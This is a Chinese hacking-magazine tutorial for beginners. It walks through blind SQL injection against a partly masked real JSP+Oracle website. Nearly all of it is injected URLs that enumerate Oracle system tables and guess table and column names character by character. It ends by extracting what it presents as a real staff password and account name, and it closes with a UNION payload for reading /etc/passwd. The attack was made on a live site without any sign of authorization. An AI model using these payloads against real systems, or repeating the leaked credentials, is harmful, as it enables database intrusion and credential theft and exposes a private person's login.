JSP+Oracle SQL Injection之旅

SQL Injection可谓是长盛不衰的话题了，从 ASP+ MSSQL到 PHP+ MYSQL，一路走来也可谓是一路艰辛，同时也造就了这个技术领 域内高手如云：Pskey、小勇、isno等人成为一代偶像人物。其实只要我们灵活利用SQL语句，说不定就会给自己带来意外的收获，自己也能过过高手瘾呢!本文是写给菜鸟看的，高手们别砍我哦!谁叫我也是菜鸟一只呢!

　　现在很多大型网站，像银行、政府网站一般采用的是JSP+Oracle，从WEB程序来看，普遍存在的问题还是很严重的，希望广大的程序员管理人员注意这方面的安全隐患。. 今天我们的目标也是JSP+Oracle的网站，对它进行SQL Injection的测试，希望达到引伸、开拓这种技术的目的。日标站点：http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797。如图1所示。

　　

　　图1

　　首先我们看看Oracle的系统数据库：

　　all_tables 存放当前ID和其他用户的所有表。

　　user_tables 存放当前用户所有表。

　　user_tab_columns 存放当前用户表的所有列。

　　这些东西是后面操作的基础，是非常重要的。下面就看具体的操作过程了。

首先需要看一下系统表是否存在，一般都是存在的，没有就没得玩了，只能回家抱孩子了。提交URL：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from all_tables) and '1'='1

　　这里是想看一下有没有“all_tables”这个系统表，将“and”后的结果和0比较，如果后面为真，这整个语句都为真，并能正常返回页面，反之就不能正常返回了。下面的判断也是这个道理，相信大家都明白，我就不多说了。再依次提交：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables) and '1'='1 　　http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns) AND '1'='1

　　返回如下结果，如图2所示。

　　

　　图2

　　都正确返回，说明存在猜测的系统表。下面看我们怎么猜它的其他表名(注意：Oracle里的表名、列名都是要大写的，要注意输写，还有下面用的到Length()、Substr()等函数的说明，请查看相关资料)。

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where substr(table_name,1,1)='P') and '1'='1 　　http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where substr(table_name,1,2)='PL') and '1'='1

　　第二个字母为L，大家也可能用Ascii()来试试。得到一个表名，第一个字符为P，第二个字符为L。汗!一个一个的试，到后来才发现这里的步骤真是多余的……

 我们再来看看这个表的长度，确定一下范围才好猜，不然不知道要猜到什么时候才能结束：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where length(table_name)>8 and table_name like'%25PL%25') and '1'='1

　　没有正确返回。看来不会大于8了，那我们试试等于8吧：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where length(table_name)=8 and table_name like'%25PL%25') and '1'='1

　　Yeah!正常返回，我们确定表名长度是8了。大家如果自己在猜测的时候，也可以用< >等来缩小范围。下面我们继续用上面的语句来猜测表名，最后得出的表名为PLAN_TAB。

　　TIPS：这里可以用Like来猜表，比如：看看有没有什么ADMIN，USERS表什么的。

　　

and 0<>(select count(*) from user_tables where table_name like '%25ADMIN%25') and '1'='1 　　and 0<>(select count(*) from user_tables where table_name like '%25USERS%25') and '1'='1

　　表名猜出来了，我们来检测一下：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where table_name='PLAN_TAB') and '1'='1

　　正常返回。我们辛苦总算没有白费，不过烟倒是牺牲了不少，不过革命尚未成功，同志仍需努力!继续猜列名：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='PLAN_TAB' and column_name like '%25PASS%25') and '1'='1

　　试试有没有PASS(一些很容易想到的我都试了)这个字段，结果很失望，什么都没有。那有什么办法将它猜出来呢?看下面的方法。

　　看来这个表里没有什么敏感列名了，有点泄气。再去翻翻Oracle的书，突然想到可以直接查列名，汗!可能是以前学MSSQL、MYSQL的时候形成固定思维了，忘了Oracle是不一样的。那我们干脆来直接的

　　看看有没有敏感列名吧!.

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where column_name like '%25PASS%25') and '1'='1

　　直接来猜看看有没有PASS，和NAME这样的列名。经测试有LIKE ID/NAME/PASSWD这三个列名，但它们有可能不在同一个表里，那我就拿LIKE PASS这个来测试。先来看看有PASSWD这个列名对应的表名的长度：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where column_name like '%25PASS%25' and length(table_name)=8) and '1'='1

  得到有NAME这个字段对应的表的长度是8，继续猜到对应的表名：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where column_name like '%25PASS%25' and substr(table_name,1,1)='T') and '1'='1

　　它们会不会在同一个表里呢?看完下面就知道了。得到PASS对应表名第一个字符为T：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where column_name like '%25PASS%25' and substr(table_name,1,8)='T_PASSWD') and '1'='1

　　一个字符一个字符来猜，方法跟上面猜表的过程一样，只是前面多了一个条件“column_name like '%25PASS%25'”。最后得到这个表名为：T_PASSWD，接下来当然得把Like ID/NMAE/ PASSWD的列名猜完整：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,-2,2)='ID') and '1'='1

　　可以确定ID两个字符在最后面两个，大家可以改变Sbustr()里的值，慢慢缩小范围：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,1)='S') and '1'='1

　　得到第一个字符为S。

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,2)='ST') and '1'='1

　　第二个字符为T。

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,3)='STA') and '1'='1

　　第三个为A……直到第八个字符。

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,8)=' STAFF_ID ') and '1'='1

从这里就可以看出完全是同一个表了。其实遇到这么多次程序，还没见过是分开建的表呢。最后得出表名是：T_PASSWD，列名有四个，分别是STAFF_ID、STS、PASSWORD、LAST_DATE，后来证实这些猜解都是正确的(进了服务器就什么都看到咯，如图3所示)。

　　

　　图3

　　以上的过程是很枯燥的，死了不少脑细胞，觉得和猜Access一样。要是Oracle有像MSSQL月月秒年个直接暴库、表的方法就好了。呵呵，接下来的事，当然是要搞个用户名和密码了。Come on!看看最小的STAFF_ID的值是多少：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797' and 1=(select min(STAFF_ID) from T_PASSWD) and '1'='1

　　返回正常。呵呵，不要客气它就是我们的目标，把它的Password搞出来先。好戏就要上演了，真还想看看《黑客帝国》里的动画：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797' and 0<>(select conut(*) from T_PASSWD where substr(PASSWORD,1,1)=’1’ and STAFF_ID=1) and '1'='1

　　当然大家也可以用Ascii()函数来猜，关于这方面很都前辈都说过了，这里就不再做说明，不然编辑说我骗稿费了，呵呵。猜不到10分钟就出来了密码：“19791108”，好像是生日哟。有密码了，没用户还不行，接下来的事就简单多了：

　　

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797' and 0<>(select conut(*) from T_PASSWD where substr(STS,1,1)=’1’ and STAFF_ID=’T’) and '1'='1

　　一步一步来。步骤和上面的没多大差别，先看看长度，再一个个来猜。这个在猜的时候用的时间就长了一点，花了我25分钟最后得到帐户是：“TANGBIN”，注入过程正式结束!

　　最后补充几点：如果开放Public组的UTL_FILE则有可能读取服务器上的文件，如果设置错误，可以得到任何文件，如：读出/etc/passwd文件，不过它要和Union联合使用，如：union select 'hoge','../../../../../etc/passwd','1','1','1' from SOMETABLE--。关于Union查询，黑防七期上angel的PHP注入文章里已经介绍得比较详细：前面的语句要构造假的条件，才能返回后面的查询。当然，你也可以尝试Update、 Insert、跨库等，如果你想知道答案的话，自己来吧!相信黑防近期就会出这样的文章了。当然如果你有什么好的办法或者资料，记得给我一份哟。